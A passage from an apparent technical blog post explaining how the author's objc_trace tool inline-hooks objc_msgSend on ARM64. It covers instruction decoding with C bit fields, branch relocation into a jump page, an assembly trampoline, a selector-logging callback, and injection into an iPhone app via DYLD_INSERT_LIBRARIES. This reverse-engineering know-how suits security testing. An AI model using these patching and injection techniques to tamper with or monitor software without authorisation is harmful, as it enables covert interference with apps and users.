__text:18DBB41C8     LDR             X13, [X0]
__text:18DBB41CC     AND             X9, X13, #0x1FFFFFFF8

Now, I don’t know about you but I don’t particularly like to use complicated bit-wise operations to extract and modify data. It’s kind of fun to do so, but it is also fragile and hard to read. Luckily for us, C was designed to work at such a low level. Each ARM64 instruction is four bytes and so we use bit fields in C structures to deal with them!

typedef struct {
    uint32_t offset   : 26;
    uint32_t inst_num : 6;
} inst_b;

This is the unconditional PC relative jump.

typedef struct {
    uint32_t condition: 4;
    uint32_t reserved : 1;
    uint32_t offset   : 19;
    uint32_t inst_num : 8;
} inst_b_cond;

And this one is the conditional PC relative jump. Back in the day, I wrote a plugin for IDAPro that gives the details of instruction under the cursor. It is called IdaRef and, for it, I produced an ASCII text file that has all the instruction and their bit fields clearly written out [3]. So the B.cond looks like this in memory. Notice right to left bit numbering.

31 30 29 28 27 26 25 24 23                                                              5 4 3            0
0  1  0  1  0  1  0  0                                      imm19                         0     cond

That is what we map our inst_b_cond structure to. Doing so allows us very easy abstraction over bit manipulation.

void check_branches(s_jump_page* t_func, instruction_t* o_func) {
	...        
        instruction_t inst = t_func->inst[i];
        inst_b*       i_b      = (inst_b*)&inst;
        inst_b_cond*  i_b_cond = (inst_b_cond*)&inst;

        ...
        } else if(i_b_cond->inst_num == 0x54) {
            // conditional branch

            // save the original branch offset
            branch_offset = i_b_cond->offset;
            i_b_cond->offset = patch_offset;
        }


        ...
            // set jump point into the original function, 
            //   don't forget that it is PC relative
            t_func->jump_patch[use_jump_patch].jmp_addr = 
                 (address_t)( 
                 	((instruction_t*)o_func) 
                 	+ branch_offset + i);
        ...

With some important details removed, I’d like to highlight how we are checking the type of the instruction by overlaying the structure over the instruction integer and checking to see if the value of the instruction number is correct. If it is, then we use that pointer to read the offset and modify it to point to one of the jump patches. In the patch we place the absolute value of the address where the instruction would’ve jumped were it still back in the original objc_msgSend function. We do so for every branch instruction we might encounter.

Once the jump page is constructed we insert the patch into objc_msgSend and complete the loop. The most important thing is, of course, that the hook function restores all the registers to the state just before CPU enters into objc_msgSend otherwise the whole thing will probably crash.

It is important to note that at the moment we require that the function to be hooked has to be at least four instructions long because that is the size of the patch. Other than that we don’t even care if the target is a proper C function.

Do look through the implementation [4], I skip over some details that glues things together but the important bits that I mention should be enough to understand, in great detail, what is happening under the hood.

Interpreting the call

Now that function hooking is done, it is time to level up and interpret the results. This is where we actually implement the objc_trace functionality. So, the patch to objc_msgSend actually redirects execution to one of our functions:

__attribute__((naked))
id objc_msgSend_trace(id self, SEL op) {
    __asm__ __volatile__ (
        "stp fp, lr, [sp, #-16]!;\n"
        "mov fp, sp;\n"

        "sub    sp, sp, #(10*8 + 8*16);\n"
        "stp    q0, q1, [sp, #(0*16)];\n"
        "stp    q2, q3, [sp, #(2*16)];\n"
        "stp    q4, q5, [sp, #(4*16)];\n"
        "stp    q6, q7, [sp, #(6*16)];\n"
        "stp    x0, x1, [sp, #(8*16+0*8)];\n"
        "stp    x2, x3, [sp, #(8*16+2*8)];\n"
        "stp    x4, x5, [sp, #(8*16+4*8)];\n"
        "stp    x6, x7, [sp, #(8*16+6*8)];\n"
        "str    x8,     [sp, #(8*16+8*8)];\n"

        "BL _hook_callback64_pre;\n"
        "mov x9, x0;\n"

        // Restore all the parameter registers to the initial state.
        "ldp    q0, q1, [sp, #(0*16)];\n"
        "ldp    q2, q3, [sp, #(2*16)];\n"
        "ldp    q4, q5, [sp, #(4*16)];\n"
        "ldp    q6, q7, [sp, #(6*16)];\n"
        "ldp    x0, x1, [sp, #(8*16+0*8)];\n"
        "ldp    x2, x3, [sp, #(8*16+2*8)];\n"
        "ldp    x4, x5, [sp, #(8*16+4*8)];\n"
        "ldp    x6, x7, [sp, #(8*16+6*8)];\n"
        "ldr    x8,     [sp, #(8*16+8*8)];\n"
        // Restore the stack pointer, frame pointer and link register
        "mov    sp, fp;\n"
        "ldp    fp, lr, [sp], #16;\n"

        "BR x9;\n"       // call the jump page
    );
}

This function stores all calling convention relevant registers on the stack and calls our, _hook_callback64_pre, regular C function that can assume that it is the objc_msgSend as it was called. In this function we can read parameters as if they were sent to the method call, this includes the class instance and the selector. Once _hook_callback64_pre returns our objc_msgSend_trace function will restore the registers and branch to the configured jump page which will eventually branch back to the original call.

void* hook_callback64_pre(id self, SEL op, void* a1, void* a2, void* a3, void* a4, void* a5) {
	// get the important bits: class, function
    char* classname = (char*) object_getClassName( self );
    if(classname == NULL) {
        classname = "nil";
    }
    
    char* opname = (char*) op;
    ...
    return original_msgSend;
}

Once we get into the hook_callback64_pre function, things get much simpler since we can use the objc API to do our work. The only trick is the realization that the SEL type is actually a char* which we cast directly. This gives us the full selector. Counting colons will give us the count of parameters the method is expecting. When everything is done the output looks something like this:

iPhone:~ root# DYLD_INSERT_LIBRARIES=libobjc_trace.dylib /Applications/Maps.app/Maps
objc_msgSend function substrated from 0x197967bc0 to 0x10065b730, trampoline 0x100718000
000000009c158310: [NSStringROMKeySet_Embedded alloc ()]
000000009c158310: [NSSharedKeySet initialize ()]
000000009c158310: [NSStringROMKeySet_Embedded initialize ()]
000000009c158310: [NSStringROMKeySet_Embedded init ()]
000000009c158310: [NSStringROMKeySet_Embedded initWithKeys:count: (0x0 0x0 )]
000000009c158310: [NSStringROMKeySet_Embedded setSelect: (0x1 )]
000000009c158310: [NSStringROMKeySet_Embedded setC: (0x1 )]
000000009c158310: [NSStringROMKeySet_Embedded setM: (0xf6a )]
000000009c158310: [NSStringROMKeySet_Embedded setFactor: (0x7b5 )]

Conclusion

We modify the objc_msgSend preamble to jump to our hook function. The hook function then does whatever and restores the CPU state. It then jumps into the jump page which executes the possibly modified preamble instructions and jumps back into objc_msgSend to continue execution. We also maintain the original unmodified preamble for restoration when we need to remove the hook. Then we use the parameters that were sent to objc_msgSend to interpret the call and print out which method was called with which parameters.

As you can see using function hooking for making objc_trace is but one use case. But this use case is incredibly useful for blackbox security testing. That is particularly true for initial discovery work of learning about the application.


[1] objc-msg-arm64.s

[2] ARM Reference Manual

[3] ARM Instruction Details

[4] objc_trace.m